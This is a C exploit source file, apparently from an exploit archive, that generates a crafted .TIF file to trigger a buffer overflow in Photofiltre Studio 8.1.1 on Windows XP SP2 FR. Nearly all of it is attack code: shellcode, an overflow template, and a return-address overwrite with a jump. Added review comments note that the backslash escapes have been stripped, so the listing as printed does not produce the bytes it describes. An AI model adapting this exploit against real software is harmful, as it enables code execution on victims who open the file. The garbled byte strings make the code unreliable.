# Title : Photofiltre Studio v8.1.1 (.TIF File) Local Buffer Overflow Exploit
# Published : 2007-04-21
# Author : Marsu
/********************************************************************************
* *
* Photofiltre Studio v8.1.1 .TIF File Buffer Overflow *
* *
* *
* Photofiltre is vulnerable to an unspecified buffer overflow when processing a *
* crafted .TIF file. *
* This exploit just beeps (useless but incredibly noisy!!). *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr> *
********************************************************************************/
#include "stdio.h"
#include "stdlib.h"
// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
// Beep Shellcode, made by xnull
// Woaw this is very ... Hum try it!
// Payload that main() appends right after its 9-byte overwrite. Per the inline
// notes it sets up a call with a fixed duration (2000 ms) and frequency (3585)
// through a hard-coded absolute address that is specific to the one OS build
// named in the header ("Tested against Win XP SP2 FR"), so it is tied to that
// build rather than portable.
// NOTE(review): as rendered here the literal contains no backslashes, so each
// "xNN" is three ASCII characters rather than one escaped byte -- presumably
// lost in extraction; sizeof(beepsp2)-1 as used in main() therefore does not
// equal the byte count the comments describe.
unsigned char beepsp2[] =
"x55x89xE5x83xECx18xC7x45xFC"
"x77x7Ax83x7C" //Address x77x7Ax83x7C = SP2
"xC7x44x24x04"
"xD0x03" //Length xD0x03 = 2000 (2 seconds)
"x00x00xC7x04x24"
"x01x0E" //Frequency x01x0E = 3585
"x00x00x8Bx45xFCxFFxD0xC9xC3";
// Template for the crafted .TIF file that main() copies into its stack buffer
// and writes out. The leading bytes 49 49 2a 00 are the little-endian TIFF
// signature; most of the remainder is long runs of repeated, ascending
// printable bytes (0x45..0x4f) -- presumably filler used to locate the
// overwrite offset that main() patches at offset 0xd5.
// Detection note: a TIFF whose tag/strip data is made of such long runs of a
// single printable byte is an anomaly that a content check can flag before a
// vulnerable viewer opens the file.
// NOTE(review): as rendered here the literal contains no backslashes, so each
// "xNN" is three ASCII characters rather than one escaped byte -- presumably
// lost in extraction; the fixed 1360-byte length written by main() assumes the
// escaped form.
char tif_file_part1[] =
"x49x49x2ax00x08x00x00x00x17x00xfex00x04x00x01x00"
"x00x00x02x00x00x00x00x01x04x00x01x00x00x00xfdx01"
"x00x00x01x01x04x00x01x00x00x00xb6x01x00x00x02x01"
"x03x00x01x00x00x00x08x00x00x00x03x01x03x00x83x00"
"x00x00x05x00x00x00x06x01x03x00x01x00x00x00x03x00"
"x00x00x0ax01xb6x00x01x00x00x00x01x00x00x00x11x01"
"x04x00x37x00x00x00x22x01x00x00x12x01x03x00x01x00"
"x00x00x01x00x00x00x15x01x03x00x01x00x00x00x01x00"
"x00x00x16x01x03x00x01x00x00x00x08x00x00x00x17x01"
"x04x00x37x00x00x00xfex01x00x00x1ax01x05x00x01x00"
"x00x00xdax02x00x00x1bx01x05x00x01x00x00x00xe2x02"
"x00x00x1cx01x03x00x01x00x00x00x01x00x00x00x28x01"
"x03x00x01x00x00x00x02x00x00x00x29x01x03x00x02x00"
"x00x00x00x00x01x00x31x01x02x44x43x42x41x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45x45"
"x45x45x45x45x45x45x45x45x45x45x45x46x46x46x46x46"
"x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46"
"x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46"
"x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46"
"x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46x46"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47x47"
"x47x47x47x47x47x47x47x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48x48"
"x48x48x48x48x48x48x48x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax4ax4ax4ax4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4bx4b"
"x4bx4bx4bx4bx4bx4bx4bx4bx4bx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4cx4c"
"x4cx4cx4cx4cx4cx4cx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4dx4d"
"x4dx4dx4dx4dx4dx4dx4dx4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4e"
"x4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4ex4fx4fx4fx4fx4f"
"x4fx4fx4fx4fx4fx4fx4fx4fx4fx4fx4fx4fx4fx4fx92x00x92"
"x00x96x00x00x00x00x00xafx00x12x00x00x00x92x00x49"
"x00x12x00x92x00xafx00x92x00x49x00x49x00x49x00x58"
"x00xafx00x12x00x58x00x00x00x80x00x00x00x57x00x12"
"x00x5ax00x12x00x00x00x00x00x28x00x12x00x00x00x46"
"x00xfdx00xd5x00x1bx00xffx00xefx00xa9x00xd9x00x00"
"x00x70x00x6cx00xfax00x99x00xc5x00xf7x00xb4x00x48"
"x00xabx00xe9x00xdex00x1bx00xffx00xd7x00x64x00xa9"
"x00xd9x00x6ex00x68x00x70x00x92x00xccx00xf2x00x99"
"x00x94x00xe9x00xadx00xb4x00x4bx00xc9x00x85x00xe9"
"x00xe5x00xb4x00x80x00x98x00x8cx00xe0x00xc4x00x33"
;
/*
 * Entry point: assembles the crafted .TIF image in a stack buffer and writes
 * it to the path given as argv[1]. Expects exactly one argument; prints usage
 * otherwise. Returns 0 on every path, including the error paths below, so a
 * caller cannot distinguish success from failure by exit status.
 * NOTE(review): the listing appears to have lost its backslash escapes (the
 * trailing "n" in each printf string and the "xNN" sequences), so as printed
 * it does not produce the bytes the comments describe.
 */
int main(int argc, char* argv[])
{
FILE* tiffile;
char evilbuff[5000];   /* uninitialized; only the bytes copied in below are defined */
int offset=0;
printf("[+] Photofiltre Studio v8.1.1 .TIF File Buffer Overflown");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
if (argc!=2) {
printf("[+] Usage: %s <file.ttf>n",argv[0]);   /* usage says .ttf, but the file produced is a .TIF (see header) */
return 0;
}
/* memcpy is declared in <string.h>, which is not included above (only
 * "stdio.h"/"stdlib.h"); older compilers accept the implicit declaration. */
memcpy(evilbuff,tif_file_part1,sizeof(tif_file_part1)-1);
offset=0xd5;   /* position inside the template (213 bytes in) where the overwrite starts */
memcpy(evilbuff+offset,"x43x43xebx05x8cx08xfcx7fx43",9); //pop pop ret in ??? + jump over EIP
/* payload follows the 9-byte overwrite; sizeof-1 drops the literal's NUL */
memcpy(evilbuff+offset+9,beepsp2,sizeof(beepsp2)-1);
printf("[+] tif_file_part2 patched!n");
if ((tiffile=fopen(argv[1],"wb"))==0) {
printf("[-] Unable to access file.n");
return 0;
}
/* Length is a fixed 1360 rather than derived from the template; the fwrite
 * return value is not checked, so a short write goes unreported. */
fwrite( evilbuff, 1, 1360, tiffile );
fclose(tiffile);
printf("[+] Done. Have fun!n");
return 0;
}